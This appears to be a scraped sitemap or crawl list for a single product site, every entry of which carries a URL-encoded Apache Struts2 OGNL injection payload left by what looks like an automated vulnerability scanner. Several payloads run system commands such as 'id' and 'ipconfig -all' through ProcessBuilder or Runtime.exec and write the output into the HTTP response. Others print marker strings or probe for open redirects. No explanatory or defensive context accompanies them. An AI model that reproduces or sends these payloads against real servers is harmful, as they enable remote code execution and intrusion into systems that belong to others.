0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f=osm51422%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem44272%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27%5b%5d_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 